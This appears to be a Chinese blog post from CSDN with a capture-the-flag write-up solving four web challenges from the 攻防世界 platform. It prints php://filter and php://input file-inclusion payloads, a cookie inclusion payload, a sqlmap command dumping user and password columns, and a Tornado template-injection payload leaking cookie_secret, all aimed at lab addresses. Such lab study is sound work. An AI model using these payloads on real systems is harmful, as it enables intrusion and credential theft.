攻防世界--fileclude && fileinclude && inget && easytornado

已于 2023-09-08 09:35:12 修改
阅读量2.3k 收藏 5
点赞数 1
分类专栏: ctf学习 文章标签: php 开发语言
于 2022-08-25 22:01:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xulei1132562/article/details/126533422
版权

一、fileclude

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
    $file1 = $_GET["file1"];
    $file2 = $_GET["file2"];
    if(!empty($file1) && !empty($file2))
    {
        if(file_get_contents($file2) === "hello ctf")
        {
            include($file1);
        }
    }
    else
        die("NONONO");
}

两个参数file1和file2
file2中包含数据file_get_contents
直接访问flag.php只显示WRONG WAY!
说明flag应该在flag.php的注释里
包含的是file1
所以

?file1=php://filter/read=convert.base64-encode/resource=flag.php

file2使用php伪协议传数据

file2=php://input

最后
http://61.147.171.105:61741/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input

然后POST数据
hello ctf
在这里插入图片描述
拿到flag
在这里插入图片描述

然后base64转码即可

二、fileinclude

注释
在这里插入图片描述
在这里插入图片描述
发现源码泄露

?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
	@setcookie("language","english");
	@include("english.php");
}
else
{
	@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?

发现文件包含点在COOKIE中,使用php伪协议filter的读,base64编码

COOKIE:language=php://filter/read=convert.base64-encode/resource=flag

在这里插入图片描述
base转码
在这里插入图片描述

三、inget

在这里插入图片描述
SQL注入
在这里插入图片描述
在这里插入图片描述

sqlmap -u "http://61.147.171.105:54122/?id=1" -T cyber -C user,ID,pw --dump

在这里插入图片描述

四、easytornado

模板注入
在这里插入图片描述

http://61.147.171.105:57847/error?msg={{handler.settings}}

在这里插入图片描述
先把flag的filename进行md5,然后再把cookie_secret与md5后的值拼接,再md5
在这里插入图片描述
欢迎加入我的知识星球,内含有多篇赏金漏洞
某211硕在读,三分之一的白帽子,三分之一的科研er,这里适合想要学习安全的小白师傅,适合致力于挖掘漏洞的师傅,适合安全研究人员师傅,以及想要做安全科研的师傅,想要了解网络空间安全研究生生活的师傅
在这里插入图片描述

梅苑安全
关注
专栏目录
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议)
等风来
07-31 4964
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
【网络安全 | CTF】攻防世界 inget 解题详析
等风来
07-23 4586
由于该语句为真,却无回显,故可排除数字型注入。语句,再根据回显做下一步判断。思路:尝试利用or构造。使用sqlmap爆数据。
攻防世界-fileinclude
2301_79858466的博客
07-21 1281
💡 convert.base64-encode/convert.base64-decode是转换过滤器属于read的参数,💡 相当于base64_encode()和 base64_decode(),作用是base64 编码解码。💡 read= 该参数可选。可以设定一个或多个过滤器名称,以 管道符(|)分隔。两个链的过滤器> 任何没有以 read= 或 write= 作前缀的筛选器列表会视情。💡 resource= 必须项。💡 write= 该参数可选。
攻防世界----fileclude
最新发布
qq_45021843的博客
09-24 176
php中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。Filterphp://filter/过滤器|过滤器/resource=待过滤的数据流。
攻防世界-file_include
m0_49025459的博客
12-18 7391
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界file_include
小缪的博客
06-10 3022
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界fileclude
qq_73861475的博客
05-20 2212
首先打开环境进入环境代码分析我们可以看出我们所找的flag就在flag.php这一个文件夹中,然后我们可以看出有两个变量$_GETfilel1和$GET_filel2,我们要获取到;两个变量的get数据给到filel1和filel2。构造payload,这里文件包含的file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入注入 “?得到接着将得到的编码进行base64解码,得到flag为是php
【网络安全 | CTF】攻防世界 get_post 解题详析
等风来
05-20 3811
题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?使用Hack Bar提交GET参数Payload:?a=1
xctf新手练习https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=0
weixin_30438813的博客
05-23 2836
view source Q:无法用鼠标右键查看原码,怎么办?A:浏览器地址栏在网址前输入 view-source: 即可查看源码 get post Q:用 get 提交 a=1,用 post 提交 b=2A:url后加 ?a=1,用 hackbar 提交b=2 robots Q:robots.txtA:域名后加 robots.txt backup Q:找到网站的备份文件A:暴力域名。...
DPDK-19.05在CentOS7.4.1708上环境搭建
hn3e81的博客
06-20 2926
DPDK-19.05在CentOS7.4.1708上环境搭建 我安装的是CentOS7.4.1708 64位,使用的dpdk19.05版本 (一)配置环境要求 1.安装CentOS7时,要求至少4个核心(可以2个CPU,2个Core,或者1个CPU,4个Core) 2.内存至少1G(为了配置hugepage,多分点比较好) 3. 网卡至少两个 安装虚拟机网卡: (1)先将虚拟机shutdown;...
python读取加密word_Python-使用zipfile读取受密码保护的Word文档
weixin_39848097的博客
12-09 1221
我正在尝试使用zipfile在Python上读取受密码保护的Word文档。以下代码适用于不受密码保护的文档,但与受密码保护的文件一起使用时会出错。try:fromxml.etree.cElementTreeimportXMLexceptImportError:fromxml.etree.ElementTreeimportXMLimportzipfilepsw="1234"WORD_NAMESPAC...
攻防世界file_include
m0_74979597的博客
09-13 1867
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
攻防世界---fileinclude
m0_72447684的博客
10-11 1274
攻防世界---fileinclude
攻防世界-fileclude
m0_49025459的博客
12-28 1199
访问题目场景阅读php代码构造payload,这里文件包含的file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入。
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3408
攻防世界 -- fileinclude
攻防世界fileinclude
……
09-13 7749
攻防世界文件包含题目
file_include(攻防世界)
m0_56107268的博客
11-14 7968
php转化器的学习
fileclude-CTF-攻防世界
szhangliwenya的博客
03-20 854
file1中用php://filter流来读取flag.php文件,同时用convert.iconv[]过滤器将flag编码输出,没有用convert.base64-encode因为出来的会是一串base64字符串,还要解密。file2中利用data://协议构造数据流,将hello ctf 当做php文件执行,直接传参行不通,因为file_get_contents是将文件中的数据提取我为字符串。对于大文件,应该考虑使用其他方法,如逐行读取文件或使用流(stream)处理。如果变量存在并且不是 NULL,
攻防世界 fileinclude
qq_73861475的博客
05-20 545
因为变量是用cookie传参的,所以我们构造的playload是关于cookie的,在bp里面将cookie更改为我们构造的,最后就会得到。红线圈出来的就是flag的base64编码值,所以我们要将红线圈出来的值进行base64解码就会得到flag。include函数用php://filter伪协议来绕过。我们可以看这个页面知道flag在flag.php这个文件中,而且还有文件路径为。首先打开题目进入环境,在此之前题目没有太多提示。传参,所以我们要改cookie的值。可以用于读取、写入文件等函数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅苑安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值